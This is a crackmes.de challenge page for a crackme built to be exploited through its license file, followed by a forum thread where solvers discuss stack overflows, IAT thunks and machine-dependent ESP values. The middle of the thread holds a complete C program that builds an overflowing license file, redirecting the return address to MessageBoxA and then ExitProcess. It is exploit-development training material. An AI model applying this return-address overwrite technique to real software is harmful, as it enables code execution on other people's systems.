
abcd's battleroyale
Download abcd__s_battle_royale.zip, 22 kb (password: crackmes.de)
The challenge is to exploit a vulnerability in the program and display a dialog box. Details are in the readme file. This is a tough one for sure!!!
Difficulty: 4 - Needs special knowledge. Author: abcd
Solutions
Solution by Ox87k, published 04. Apr 2008; download (1793 kb), password: crackmes.de. Ox87k rated this crackme as awesome.
Solution by DigitalAcid, published 04. Apr 2008; download (139 kb), password: crackmes.de. DigitalAcid rated this crackme as awesome.
Solution by antofik, published 04. Apr 2008; download (26 kb), password: crackmes.de. antofik rated this crackme as nothing special.
Discussion and comments
DigitalAcid, 27. Mar 2008: Hmm, your "solution" doesn't work here, because the addresses are different. I think we have to exploit the license file (buffer overflow or code injection or something?).
cosmos, 28. Mar 2008: Hmm, I need to work more...
DigitalAcid, 28. Mar 2008: I managed to inject a messagebox using the license file, but I still get an error after clicking the OK button. I don't know enough to fix it =). Other than that, it works :P.
abcd (Author), 29. Mar 2008: @DigitalAcid Please submit your solution... you may be right after all... :)
DigitalAcid, 29. Mar 2008: Uploaded my tutorial. If my solution is correct, I really liked this crackme :).
Sinok, 29. Mar 2008: And if it isn't? :P
DigitalAcid, 29. Mar 2008: Then I'm disappointed :P.
TeruS, 30. Mar 2008: Own3d =) I'll try to post only the license.lic file as a solution :) Would you mind?
ksnrcp, 31. Mar 2008: I think I got it :) Several jumps above the msgbox address can jump to the license check, hehehe.
Ox87k, 31. Mar 2008: Very interesting, solved it! I have a valid license file in order to exploit it as you want, but I have a problem. I need ESP, but it changes from PC to PC and so I can't memorize it. The only way I know is to create a loader that runs the crackme; after you press Test it grabs the value of ESP and with it creates a valid license file. @abcd: Can it be a valid solution?
TeruS, 31. Mar 2008: Ox87k, look at the IAT and use it for your sploit to work on other PCs. All you need is there (if I've understood you properly). Good luck! :)
Ox87k, 31. Mar 2008: TeruS, your keyfile doesn't work on my PC; in fact it crashes when, after the retn, you call MessageBoxA (I don't understand how you can exploit it with a retn over MessageBox without any parameters!). You have to inject your code into memory with the license file and not just call the messagebox (moreover without any parameters).
DigitalAcid, 31. Mar 2008: Woah, Ox87k, that looks great. Mine is crashing all the time after clicking the OK button. I don't think my solution will be right now =). Although I can't download TeruS' file, I also exploited a RET to redirect it to my own code. It should only work on my own PC, due to different address stuff.
Ox87k, 31. Mar 2008: @DigitalAcid: Exactly! ;) But... why is your license crashing after clicking the OK button?
DigitalAcid, 31. Mar 2008: It's because of the RET. I tried adding a jump to make it go back to some original code, but nothing seems to work. @Ox87k: did you use/modify the about box 8-)?
Ox87k, 31. Mar 2008: @DigitalAcid: Read the readme and see the IAT (about your error)...! :P I didn't use the about box and I didn't modify anything in the exe, just made it all with the license file :)
DigitalAcid, 31. Mar 2008: Oh, I didn't see we had to add "Hacked!" as the text :s. What is the connection between the IAT and my error O.o?
Ox87k, 31. Mar 2008: Are you sure you have read the readme.txt? :D Just think about this part: "...the OK button to exit the program"
abcd (Author), 01. Apr 2008: Just to make some things clear, the exit messagebox must appear like this: http://www.mediafire.com/imageview.php?quickkey=mhxxid53b4g&thumb=4 And to all those people who have solved it, please submit your tutorials. @Ox87k, your video preview was looking great.
Ox87k, 01. Apr 2008: I submitted my solution yesterday night ;)
TeruS, 01. Apr 2008: Mmm... What have I done? I saw that the name was loaded onto the stack without checking its size, so we overwrite the return address of the function with jmp dword ptr [MessageBoxA], and while calling this, at the top of the stack there must be the address of ExitProcess, and after it go the parameters of these functions...
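The frame layout TeruS describes (overwritten return address pointing at the exe's jmp dword ptr [MessageBoxA] thunk, the ExitProcess thunk as MessageBoxA's return address, then the arguments of both calls) can be generated rather than hand-typed. The following is an added example for this page, not code from the crackme or from any submitted solution. The buffer size, the thunk addresses, the ESP value and the assumption that the name is copied with a length-based copy (the payload contains zero bytes) are all placeholders the reader must replace after disassembling the license routine.

```c
/* Added example, not from the crackme or any posted solution: builds the
 * oversized name field for the stack layout described in the thread.
 * Every number below is an assumed placeholder; real values come from
 * disassembling the crackme's license routine. */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Assumed frame geometry: the name is copied into a 32-byte stack buffer and
 * the saved return address follows the saved EBP. */
#define NAME_BUF_SIZE 32u
#define RET_OFFSET    (NAME_BUF_SIZE + 4u)  /* buffer start -> saved EIP */
#define ARGS_SIZE     32u  /* 8 dwords: two thunks, MessageBoxA's 4 args, ExitProcess's ret+arg */

/* Placeholder addresses of the exe's import thunks ("jmp dword ptr [IAT slot]").
 * These live in the image, so they do not move between machines. */
struct targets {
    uint32_t jmp_messagebox;   /* jmp dword ptr [__imp__MessageBoxA@16] */
    uint32_t jmp_exitprocess;  /* jmp dword ptr [__imp__ExitProcess@4]  */
};

static void put_le32(uint8_t *p, uint32_t v)
{
    p[0] = (uint8_t)v;         p[1] = (uint8_t)(v >> 8);
    p[2] = (uint8_t)(v >> 16); p[3] = (uint8_t)(v >> 24);
}

uint32_t get_le32(const uint8_t *p)
{
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* Writes the payload into out[] and returns its length (0 if cap is too small).
 * esp_at_ret is the ESP value when the vulnerable function executes RET, i.e.
 * the address of the overwritten return address. It is the one machine-
 * dependent input: both string pointers are computed from it.
 * Assumes the crackme copies the name with a length-based copy, since the
 * payload contains zero bytes (a strcpy-style copy would stop at the first). */
size_t build_license(uint8_t *out, size_t cap, const struct targets *t,
                     uint32_t esp_at_ret, const char *text, const char *caption)
{
    size_t text_len = strlen(text) + 1, caption_len = strlen(caption) + 1;
    size_t strings_off = RET_OFFSET + ARGS_SIZE;
    size_t total = strings_off + text_len + caption_len;
    if (total > cap)
        return 0;

    memset(out, 'A', RET_OFFSET);                 /* filler up to the saved EIP */
    uint8_t *f = out + RET_OFFSET;

    /* After RET, ESP = esp_at_ret + 4 and the thunk lands in MessageBoxA with a
     * normal stdcall frame: [ret][hWnd][lpText][lpCaption][uType]. */
    put_le32(f + 0,  t->jmp_messagebox);          /* overwritten return address */
    put_le32(f + 4,  t->jmp_exitprocess);         /* MessageBoxA returns here  */
    put_le32(f + 8,  0);                          /* hWnd = NULL               */
    put_le32(f + 12, esp_at_ret + ARGS_SIZE);                      /* lpText    */
    put_le32(f + 16, esp_at_ret + ARGS_SIZE + (uint32_t)text_len); /* lpCaption */
    put_le32(f + 20, 0);                          /* uType = MB_OK             */

    /* MessageBoxA ends with 'ret 10h', so ESP then points at f+24 and the
     * ExitProcess thunk sees [ret][uExitCode]. ExitProcess never returns. */
    put_le32(f + 24, 0);                          /* dummy return address      */
    put_le32(f + 28, 0);                          /* uExitCode = 0             */

    /* Strings sit above the argument block, i.e. at addresses higher than ESP
     * inside MessageBoxA, so the callee's own pushes cannot clobber them. */
    memcpy(out + strings_off, text, text_len);
    memcpy(out + strings_off + text_len, caption, caption_len);
    return total;
}

/* Sanity check of the layout with placeholder values; returns 1 when the
 * pointers and offsets agree with each other. */
int layout_self_check(void)
{
    struct targets t = { 0x00401000u, 0x00401006u };   /* placeholders */
    uint32_t esp_at_ret = 0x0012FF40u;                  /* placeholder */
    uint8_t buf[256];
    size_t n = build_license(buf, sizeof buf, &t, esp_at_ret, "Hacked!", "Hacked!");
    if (n != RET_OFFSET + ARGS_SIZE + 16) return 0;
    if (get_le32(buf + RET_OFFSET) != t.jmp_messagebox) return 0;
    if (get_le32(buf + RET_OFFSET + 4) != t.jmp_exitprocess) return 0;
    /* lpText must point exactly where "Hacked!" was placed: the buffer starts
     * at esp_at_ret - RET_OFFSET, so file offset = ptr - esp_at_ret + RET_OFFSET */
    uint32_t text_ptr = get_le32(buf + RET_OFFSET + 12);
    size_t text_off = (size_t)(text_ptr - esp_at_ret) + RET_OFFSET;
    if (memcmp(buf + text_off, "Hacked!", 8) != 0) return 0;
    return 1;
}

int main(void)
{
    struct targets t = { 0x00401000u, 0x00401006u };  /* placeholders */
    uint8_t buf[256];
    size_t n = build_license(buf, sizeof buf, &t, 0x0012FF40u, "Hacked!", "Hacked!");
    if (n == 0) return 1;
    fwrite(buf, 1, n, stdout);                         /* ./mklic > license.lic */
    return 0;
}
```

The thunk addresses are properties of the image and stay fixed, which is the IAT point TeruS makes; the two string pointers are the only values derived from ESP, and that single dependency is why a keyfile built for one machine's stack fails on another. Before using a layout like this, check how the crackme actually reads the name: a string-based copy stops at the first zero byte, and both the NULL hWnd and the image addresses contain zeros. Placing the strings above the argument block rather than below ESP also avoids the callee's own pushes overwriting them, a common cause of garbage or missing text in the box.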
DigitalAcid, 02. Apr 2008: @Ox87k, thx for pointing that out :). It works without error now. Weee, finally got a working version now :P. I had problems with my string that got overwritten. After lots of frustration I now learned why it happened =). Only had to add 3 bytes :O.
andrewl.us (Moderator), 03. Apr 2008: How are you guys viewing submissions before any solutions are approved?
TiGa, 04. Apr 2008: Nice to see new people making videos.
DigitalAcid, 04. Apr 2008: I asked my nephew to test the crackme on his PC with my (same) license and he said it worked, so please somebody try my file too :). It might have been coincidence.
abcd (Author), 04. Apr 2008: @DigitalAcid your solution did not work on my comp :( ... but I think you got the solution later so you can update it...
TeruS, 04. Apr 2008: If I understand correctly, then there can't be a universal solution...
TeruS, 04. Apr 2008: Of all the submitted solutions only the one by DigitalAcid worked for me...
Ox87k, 04. Apr 2008: @DigitalAcid: Your keyfile doesn't work for me either, but I don't think it's a problem. I agree with TeruS, I think it's impossible to find a valid universal keyfile. All depends on ESP's value. Maybe on some machines it works well because they can have the same ESP that DigitalAcid's solution requires, but on many other machines it doesn't. You can see this difference in my solution; look at the video solution, I tried to show you this crackme on two different machines with the same OS.
TeruS, 05. Apr 2008: As for me, on a VM my keyfile works almost well :) But instead of good text in the box I receive some unrecognizable characters :)
DigitalAcid, 06. Apr 2008: @TeruS: I had the same problem but without using a VM. What I did was subtract a value from ESP, as you can see in my tutorial. My string simply got overwritten.
Ox87k, 06. Apr 2008: @DigitalAcid: If you don't want your string to be overwritten, try to copy ESP into another register and then subtract from it, as I did.